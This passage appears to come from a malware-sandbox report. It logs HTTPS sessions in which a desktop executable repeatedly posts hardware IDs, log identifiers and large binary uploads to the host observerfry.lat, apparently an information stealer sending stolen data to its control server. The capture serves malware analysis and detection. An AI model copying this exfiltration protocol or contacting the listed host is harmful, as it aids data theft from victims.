307erxdd9rv24BTZIt0Rs0D27u2Q2jQ2+Ryq9xpS4YfAYd6vX0qxo7LiFZ92lxmmSvX0pNmUPC2rRefdGE78lcpM1a8ZVPqw/uIc1CHbUPoO//7thtodJapT6dgBX+jR0g7K4BhZv+Ky5hLUKtcctEr15r/RnTQnslbg0Q1C+5rCRsGsEUf6qOClV58pz1DsDs7hvc6ZcR+vR/zdB0WzjoNZk6cTFaf69OoQ3CHWGbhD/e+o35w3JLNE7NALTPm
2024-12-24 07:53:48 UTC	1369	IN	Data Raw: 2b 42 48 46 66 79 39 38 65 51 54 31 69 4c 59 46 37 42 63 38 75 47 2f 33 35 73 34 49 37 56 45 35 39 73 41 53 50 71 63 77 55 33 55 70 78 42 51 76 2f 53 79 34 67 47 66 64 70 63 78 75 55 58 30 76 66 65 65 68 58 30 33 2b 55 50 6d 6c 6c 49 4a 38 35 76 49 53 74 36 6a 45 46 62 74 75 2f 54 33 47 64 49 6b 78 52 71 2f 53 2f 58 72 6f 4e 32 63 4e 53 57 31 56 75 50 57 43 55 4b 7a 33 34 31 48 79 2b 42 48 46 64 79 74 35 4f 38 65 30 7a 6a 63 45 62 64 59 39 66 62 74 6b 4e 6f 69 4b 61 67 45 73 73 41 61 58 76 53 4f 67 31 6d 54 70 78 4d 56 70 2f 72 30 37 42 2f 59 4b 4e 6b 43 73 55 6a 33 36 61 54 58 6e 6a 73 74 75 55 44 75 30 51 39 4b 2f 35 72 4b 51 39 79 6b 46 6c 76 32 74 62 4b 72 57 64 67 32 6c 30 6a 30 62 2b 50 6c 6f 64 50 61 4c 47 43 67 42 4f 33 61 53 68 47 7a 6e 63 4e 46 Data Ascii: +BHFfy98eQT1iLYF7Bc8uG/35s4I7VE59sASPqcwU3UpxBQv/Sy4gGfdpcxuUX0vfeehX03+UPmllIJ85vISt6jEFbtu/T3GdIkxRq/S/XroN2cNSW1VuPWCUKz341Hy+BHFdyt5O8e0zjcEbdY9fbtkNoiKagEssAaXvSOg1mTpxMVp/r07B/YKNkCsUj36aTXnjstuUDu0Q9K/5rKQ9ykFlv2tbKrWdg2l0j0b+PlodPaLGCgBO3aShGzncNF
2024-12-24 07:53:48 UTC	1369	IN	Data Raw: 44 34 72 4c 44 51 47 74 45 67 30 41 62 30 55 63 65 6f 37 64 47 41 63 33 61 41 58 61 72 52 42 67 6d 72 30 64 68 48 30 36 63 46 51 2f 69 32 34 2b 34 55 30 77 7a 59 46 36 4a 4e 39 2b 57 38 31 39 59 34 49 2f 6b 4b 71 74 45 53 43 61 76 52 34 6b 66 46 6f 7a 42 57 37 72 4f 79 71 31 6e 59 4f 4a 64 49 39 48 43 34 39 4b 37 4f 6d 54 77 2f 68 77 53 79 7a 7a 51 4a 2b 49 66 4b 55 4e 43 32 46 46 6a 7a 71 38 79 6c 51 59 74 38 68 55 4c 6d 48 4f 65 6d 73 75 48 55 63 79 2f 35 48 4e 50 50 53 6c 2b 7a 79 5a 38 4f 6b 37 4a 66 44 62 2f 39 38 66 63 4c 32 53 33 42 45 2f 4e 77 78 73 47 37 31 4a 30 6a 4b 61 35 4c 71 70 68 4b 52 72 50 4a 39 41 44 61 70 77 52 45 36 62 66 69 34 6c 6e 67 59 4a 63 49 39 42 61 34 30 36 37 51 6c 44 51 34 71 41 6e 4e 77 41 42 4f 34 35 62 61 54 35 50 75 58 Data Ascii: D4rLDQGtEg0Ab0Uceo7dGAc3aAXarRBgmr0dhH06cFQ/i24+4U0wzYF6JN9+W819Y4I/kKqtESCavR4kfFozBW7rOyq1nYOJdI9HC49K7OmTw/hwSyzzQJ+IfKUNC2FFjzq8ylQYt8hULmHOemsuHUcy/5HNPPSl+zyZ8Ok7JfDb/98fcL2S3BE/NwxsG71J0jKa5LqphKRrPJ9ADapwRE6bfi4lngYJcI9Ba4067QlDQ4qAnNwABO45baT5PuX
2024-12-24 07:53:48 UTC	1369	IN	Data Raw: 31 39 51 2f 45 59 74 38 54 72 6c 54 47 32 49 62 53 6e 44 51 30 76 6b 4c 4d 39 6b 6f 48 73 35 36 4e 47 4f 72 67 56 78 58 41 39 4c 4c 39 57 59 64 75 34 68 4f 36 51 50 2f 77 76 4a 4f 79 45 42 53 44 42 73 62 52 48 77 76 48 6c 74 31 52 32 4b 30 54 46 62 48 36 39 4b 56 42 6a 32 43 58 46 4b 55 4f 6f 4c 62 2f 68 63 39 67 65 65 6b 57 39 5a 67 54 43 65 58 52 6c 52 4b 64 34 41 30 56 70 2f 71 31 35 67 76 4e 4b 4e 51 47 74 77 6e 47 32 49 72 51 6e 54 49 34 71 56 50 6c 36 44 52 63 38 4a 2f 44 52 38 57 78 58 78 75 2f 74 62 4b 39 49 4a 39 6d 6c 79 2f 36 44 75 43 6d 39 5a 36 76 4d 43 43 33 51 2f 7a 48 52 32 37 39 6c 73 78 57 77 37 63 51 46 62 48 36 39 4b 56 42 6a 57 43 58 46 4b 55 4f 6f 4c 62 2f 68 63 39 67 65 65 6b 57 39 5a 67 54 43 65 58 52 6c 52 4b 64 34 41 30 56 70 2f Data Ascii: 19Q/EYt8TrlTG2IbSnDQ0vkLM9koHs56NGOrgVxXA9LL9WYdu4hO6QP/wvJOyEBSDBsbRHwvHlt1R2K0TFbH69KVBj2CXFKUOoLb/hc9geekW9ZgTCeXRlRKd4A0Vp/q15gvNKNQGtwnG2IrQnTI4qVPl6DRc8J/DR8WxXxu/tbK9IJ9mly/6DuCm9Z6vMCC3Q/zHR279lsxWw7cQFbH69KVBjWCXFKUOoLb/hc9geekW9ZgTCeXRlRKd4A0Vp/
2024-12-24 07:53:49 UTC	1369	IN	Data Raw: 6e 32 43 58 48 50 51 57 75 4f 65 6e 7a 70 63 38 4b 66 56 44 38 4e 46 4b 42 37 4f 66 6a 52 69 54 6f 52 56 46 38 72 58 31 71 52 2f 52 49 4a 63 50 2b 6c 65 34 38 4f 32 47 79 58 31 75 71 77 53 79 6c 6b 31 4b 34 59 50 4c 51 38 57 6a 57 47 76 42 6c 2b 44 69 43 64 78 73 35 68 32 77 57 4f 33 6c 76 64 6d 6b 44 51 4f 72 51 2f 72 56 53 48 6a 6c 6b 73 31 4f 31 4f 42 52 46 65 66 36 71 71 55 30 7a 53 6e 48 45 2f 51 41 75 4f 72 74 68 74 6f 2b 50 4c 35 55 36 5a 6f 4e 55 2f 54 52 30 67 37 4b 34 41 6b 56 70 2b 6d 38 70 51 75 66 64 70 64 58 75 6b 50 35 35 61 50 64 69 43 45 6f 75 6c 4c 70 6b 54 52 33 33 6f 50 4b 55 4e 44 69 4c 6c 6a 37 72 4f 66 6d 43 64 67 51 36 54 32 6d 53 65 6a 6c 37 2f 4b 64 50 69 4b 48 65 74 33 48 44 56 6d 78 74 38 35 57 30 4f 42 52 46 65 66 36 71 71 55 Data Ascii: n2CXHPQWuOenzpc8KfVD8NFKB7OfjRiToRVF8rX1qR/RIJcP+le48O2GyX1uqwSylk1K4YPLQ8WjWGvBl+DiCdxs5h2wWO3lvdmkDQOrQ/rVSHjlks1O1OBRFef6qqU0zSnHE/QAuOrthto+PL5U6ZoNU/TR0g7K4AkVp+m8pQufdpdXukP55aPdiCEoulLpkTR33oPKUNDiLlj7rOfmCdgQ6T2mSejl7/KdPiKHet3HDVmxt85W0OBRFef6qqU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49701	172.67.199.72	443	7284	C:\Users\user\Desktop\2oM46LNCOo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 07:53:50 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BAJQL1SU3XP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12808 Host: observerfry.lat
2024-12-24 07:53:50 UTC	12808	OUT	Data Raw: 2d 2d 42 41 4a 51 4c 31 53 55 33 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 43 41 32 46 37 34 46 32 41 37 32 45 41 33 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 42 41 4a 51 4c 31 53 55 33 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 41 4a 51 4c 31 53 55 33 58 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 42 41 4a 51 4c 31 53 55 33 58 50 Data Ascii: --BAJQL1SU3XPContent-Disposition: form-data; name="hwid"8ACA2F74F2A72EA3BEBA0C6A975F1733--BAJQL1SU3XPContent-Disposition: form-data; name="pid"2--BAJQL1SU3XPContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--BAJQL1SU3XP
2024-12-24 07:53:51 UTC	1125	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 07:53:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0ou1ep625srbo23ipmg6gg9g7e; expires=Sat, 19 Apr 2025 01:40:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rExLokmAyIQ%2Bi5iB22gliiTvYnqiiCLSUBWivEdaeLvCCWWRDQAzwiysN%2FOWsXZ3SgRgofifmWn3vCIdf5b6gelcUYhycIBfqU9RTfSY8lXH01xhIjqjuxybZwePZyNyCKE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6f051c7ed24326-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1674&rtt_var=658&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13740&delivery_rate=1625835&cwnd=178&unsent_bytes=0&cid=63754dfd842bc9bc&ts=1035&x=0"
2024-12-24 07:53:51 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 07:53:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49703	172.67.199.72	443	7284	C:\Users\user\Desktop\2oM46LNCOo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 07:53:53 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=F164H2S7ON User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15034 Host: observerfry.lat
2024-12-24 07:53:53 UTC	15034	OUT	Data Raw: 2d 2d 46 31 36 34 48 32 53 37 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 43 41 32 46 37 34 46 32 41 37 32 45 41 33 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 46 31 36 34 48 32 53 37 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 31 36 34 48 32 53 37 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 46 31 36 34 48 32 53 37 4f 4e 0d 0a 43 6f Data Ascii: --F164H2S7ONContent-Disposition: form-data; name="hwid"8ACA2F74F2A72EA3BEBA0C6A975F1733--F164H2S7ONContent-Disposition: form-data; name="pid"2--F164H2S7ONContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--F164H2S7ONCo
2024-12-24 07:53:54 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 07:53:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g3ofub5kio9s55tld67lt1kkmk; expires=Sat, 19 Apr 2025 01:40:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvAkrtjwEJ%2F8ne4A0VmKF9WndF5YAd0EMbIvDrlVgLc5vjv4yVLMHWleLW8Oh21DUrRrWp8%2Bdp%2BAF6ISXesrrmH%2Bo1O5HX6mUIGqy9okmBQ8ejhBTJtFZL7eUH%2FZ229hhS0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6f052c4b0c8c18-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1787&rtt_var=694&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15965&delivery_rate=1551540&cwnd=206&unsent_bytes=0&cid=2609640b7314c502&ts=951&x=0"
2024-12-24 07:53:54 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 07:53:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49709	172.67.199.72	443	7284	C:\Users\user\Desktop\2oM46LNCOo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 07:53:56 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SOA2J1545BSBGY5G75S User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20413 Host: observerfry.lat
2024-12-24 07:53:56 UTC	15331	OUT	Data Raw: 2d 2d 53 4f 41 32 4a 31 35 34 35 42 53 42 47 59 35 47 37 35 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 43 41 32 46 37 34 46 32 41 37 32 45 41 33 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 53 4f 41 32 4a 31 35 34 35 42 53 42 47 59 35 47 37 35 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 4f 41 32 4a 31 35 34 35 42 53 42 47 59 35 47 37 35 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 Data Ascii: --SOA2J1545BSBGY5G75SContent-Disposition: form-data; name="hwid"8ACA2F74F2A72EA3BEBA0C6A975F1733--SOA2J1545BSBGY5G75SContent-Disposition: form-data; name="pid"3--SOA2J1545BSBGY5G75SContent-Disposition: form-data; name="lid"LOGS11--Li
2024-12-24 07:53:56 UTC	5082	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: (X6K~`iO\_,mi`m?ls}Q
2024-12-24 07:53:57 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 07:53:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hcccp600trdm2ep03svs7ugrs3; expires=Sat, 19 Apr 2025 01:40:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LonnwZRWb%2FOU%2FLzB9d0Q%2FzMdR3P6arvdU4yTV%2BzfYMqyZI6GR71qv0oLin3C04y%2BI8hkXohOlQWKE9GQ8mTq5VR2cddYdkTxVUNK6v8ywJemxJ9eNPB00tdA5uzci9viH5s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6f053e8e904207-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1741&rtt_var=653&sent=15&recv=27&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21375&delivery_rate=1677197&cwnd=183&unsent_bytes=0&cid=448a0902991e5ab6&ts=971&x=0"
2024-12-24 07:53:57 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 07:53:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49715	172.67.199.72	443	7284	C:\Users\user\Desktop\2oM46LNCOo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 07:53:59 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6VQ8FIH0S8HKB93M6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1251 Host: observerfry.lat
2024-12-24 07:53:59 UTC	1251	OUT	Data Raw: 2d 2d 36 56 51 38 46 49 48 30 53 38 48 4b 42 39 33 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 43 41 32 46 37 34 46 32 41 37 32 45 41 33 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 36 56 51 38 46 49 48 30 53 38 48 4b 42 39 33 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 56 51 38 46 49 48 30 53 38 48 4b 42 39 33 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --6VQ8FIH0S8HKB93M6Content-Disposition: form-data; name="hwid"8ACA2F74F2A72EA3BEBA0C6A975F1733--6VQ8FIH0S8HKB93M6Content-Disposition: form-data; name="pid"1--6VQ8FIH0S8HKB93M6Content-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-12-24 07:53:59 UTC	1130	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 07:53:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vmec90n0hdvgog1t6m7558bhll; expires=Sat, 19 Apr 2025 01:40:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j%2BzQsVxZSq1xYx6eqqwSPahIrDDYxK7H1QfUgqLyViIbn3JUqHxeLmfyMMRct%2Fc%2BUfFUp0sjHQ01cHs46VckJ%2Bl%2BXxnGSDuxnvbaedVvE33O1OR2z92jQ%2FyxzdmrcgN1dVw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6f05519c5d32d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1790&rtt_var=695&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2166&delivery_rate=1631284&cwnd=146&unsent_bytes=0&cid=bd84b358b8a28edf&ts=785&x=0"
2024-12-24 07:53:59 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 07:53:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49728	172.67.199.72	443	7284	C:\Users\user\Desktop\2oM46LNCOo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 07:54:02 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=UYNV6FKXANE2PF5V User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 585738 Host: observerfry.lat
2024-12-24 07:54:02 UTC	15331	OUT	Data Raw: 2d 2d 55 59 4e 56 36 46 4b 58 41 4e 45 32 50 46 35 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 43 41 32 46 37 34 46 32 41 37 32 45 41 33 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 55 59 4e 56 36 46 4b 58 41 4e 45 32 50 46 35 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 59 4e 56 36 46 4b 58 41 4e 45 32 50 46 35 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 Data Ascii: --UYNV6FKXANE2PF5VContent-Disposition: form-data; name="hwid"8ACA2F74F2A72EA3BEBA0C6A975F1733--UYNV6FKXANE2PF5VContent-Disposition: form-data; name="pid"1--UYNV6FKXANE2PF5VContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
2024-12-24 07:54:02 UTC	15331	OUT	Data Raw: d0 17 2e 1c 37 21 06 ae 48 d1 cd 82 21 d6 52 a9 7b fd 65 69 2f 85 a5 cb e1 27 82 e3 ab a4 26 6c 04 dc 6a 64 72 d0 0f 23 76 10 5b 11 cc 12 f3 cd 3e 2a 32 75 23 cb dc 87 2d ba eb c0 a9 0b 47 1c 6b f8 f6 51 f3 34 52 f8 9a 74 d2 5d 04 6d 54 18 1e 78 5f 09 a0 e8 dd d6 6c 07 c1 ed 51 cb 0e de 59 83 55 45 6e 93 e6 73 01 75 a3 5a 18 a0 c2 aa 7e 9c 14 e4 28 cc 54 1a 38 2a 32 3b 35 d4 6c 8b d0 b2 5b 32 4d d0 33 c1 5d 58 18 1f 08 f6 69 31 9d 3b a4 3d 44 40 6e 15 f0 08 dc 0f 0e 23 75 a4 5a 76 81 f3 6f be e5 88 43 0a 58 58 d1 be 24 82 68 09 f7 fe 97 ea 0c e1 3f 29 ff bb e0 09 a9 b1 7a 7d ce c0 17 8d 48 30 52 37 22 13 7e e0 60 3e aa a2 63 46 58 78 a9 f9 42 77 c6 47 3e 88 f7 77 86 e1 93 63 0c de 56 c6 be 9b d9 80 2a 23 e8 8a 03 ef 9a db 72 75 d0 f0 d8 5a 40 0e 1d aa bf Data Ascii: .7!H!R{ei/'&ljdr#v[>2u#-GkQ4Rt]mTx_lQYUEnsuZ~(T82;5l[2M3]Xi1;=D@n#uZvoCXX$h?)z}H0R7"~`>cFXxBwG>wcV*#ruZ@
2024-12-24 07:54:02 UTC	15331	OUT	Data Raw: 96 a7 8a ca 11 26 c3 15 e4 e1 bb a1 42 d3 4f 9f 8b d4 1e 6b 88 e5 43 fb e0 e8 6a eb 56 24 0b e0 9c 12 b0 6a 2f 83 c1 bc e8 e0 94 fc 54 c1 09 b9 3d b3 50 dd 23 4f 62 8a b0 9a 06 fd f9 a7 5c 5d ad 47 e8 6e 53 6a b1 9c 3e 53 11 01 81 55 bb 12 64 73 09 16 a2 88 7f 3a 31 46 fa e6 9d 30 c9 0b 1a 70 e5 a9 54 7c d3 39 a2 69 cd 80 72 f2 e3 90 7d 93 75 fa 4c c5 bf ec 68 5d 12 3d 62 20 e7 f8 0d 54 03 3d e3 07 ad 6a cd e7 43 87 4f ec 60 9e 3b b7 b2 7c b1 41 6e 50 e8 c8 00 33 94 53 3e 5c 1e 74 63 60 c2 91 39 1a 0f 91 e8 c3 d8 24 db e9 56 bd 65 55 bf 16 ad c6 d2 9f 15 49 86 17 6c a6 6a 3a 8f ee a7 97 ef 44 c3 49 34 22 39 1e 05 62 8c 9c 5b 3f 9a 0f d0 64 b8 41 23 45 1e 83 ff 1b 3a a4 81 7f 97 06 04 c8 1a 70 95 7b 5d d5 21 e0 bf 72 00 b1 0f e7 54 84 c0 eb ff dd 3e 6d f6 Data Ascii: &BOkCjV$j/T=P#Ob\]GnSj>SUds:1F0pT\|9ir}uLh]=b T=jCO`;\|AnP3S>\tc`9$VeUIlj:DI4"9b[?dA#E:p{]!rT>m
